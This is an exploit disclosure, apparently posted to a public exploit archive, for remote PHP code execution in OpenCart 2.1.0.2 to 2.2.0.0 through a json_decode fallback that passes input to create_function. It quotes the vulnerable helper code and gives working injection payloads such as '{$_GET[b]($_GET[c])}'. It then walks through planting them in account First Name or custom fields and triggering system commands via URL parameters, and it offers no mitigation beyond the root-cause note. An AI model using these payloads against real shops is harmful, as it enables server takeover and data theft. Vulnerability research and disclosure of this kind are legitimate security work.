48 lines
No EOL
1.7 KiB
Text
48 lines
No EOL
1.7 KiB
Text
OpenCart json_decode function Remote PHP Code Execution
|
|
|
|
Author: Naser Farhadi
|
|
Twitter: @naserfarhadi
|
|
|
|
Date: 9 April 2016 Version: 2.1.0.2 to 2.2.0.0 (Latest version)
|
|
Vendor Homepage: http://www.opencart.com/
|
|
|
|
Vulnerability:
|
|
------------
|
|
/upload/system/helper/json.php
|
|
$match = '/".*?(?<!\\\\)"/';
|
|
$string = preg_replace($match, '', $json);
|
|
$string = preg_replace('/[,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]/', '', $string);
|
|
...
|
|
$function = @create_function('', "return {$json};"); /**** The Root of All Evil ****/
|
|
$return = ($function) ? $function() : null;
|
|
...
|
|
return $return;
|
|
|
|
Exploit(json_decode):
|
|
------------
|
|
var_dump(json_decode('{"ok":"{$_GET[b]($_GET[c])}"}'));
|
|
var_dump(json_decode('{"ok":"$_SERVER[HTTP_USER_AGENT]"}'));
|
|
var_dump(json_decode('{"ok":"1"."2"."3"}'));
|
|
|
|
Real World Exploit(OpenCart /index.php?route=account/edit)
|
|
------------
|
|
go to http://host/shop_directory/index.php?route=account/edit
|
|
fill $_SERVER[HTTP_USER_AGENT] as First Name
|
|
/** save it two times **/
|
|
Code execution happens when an admin user visits the administration panel, in this example
|
|
admin user sees his user agent as your First Name in Recent Activity :D
|
|
|
|
Another example(OpenCart account/edit or account/register custom_field): /** Best Case **/
|
|
------------
|
|
if admin adds a Custom Field from /admin/index.php?route=customer/custom_field for custom
|
|
user information like extra phone number,... you can directly execute your injected code.
|
|
go to http://host/shop_directory/index.php?route=account/edit
|
|
fill {$_GET[b]($_GET[c])} as Custom Field value
|
|
save it
|
|
go to http://host/shop_directory/index.php?route=account/edit&b=system&c=ls /** Mission Accomplished **/
|
|
|
|
Note:
|
|
------------
|
|
Exploit only works if PHP JSON extension is not installed.
|
|
|
|
Video: https://youtu.be/1Ai09IQK4C0 |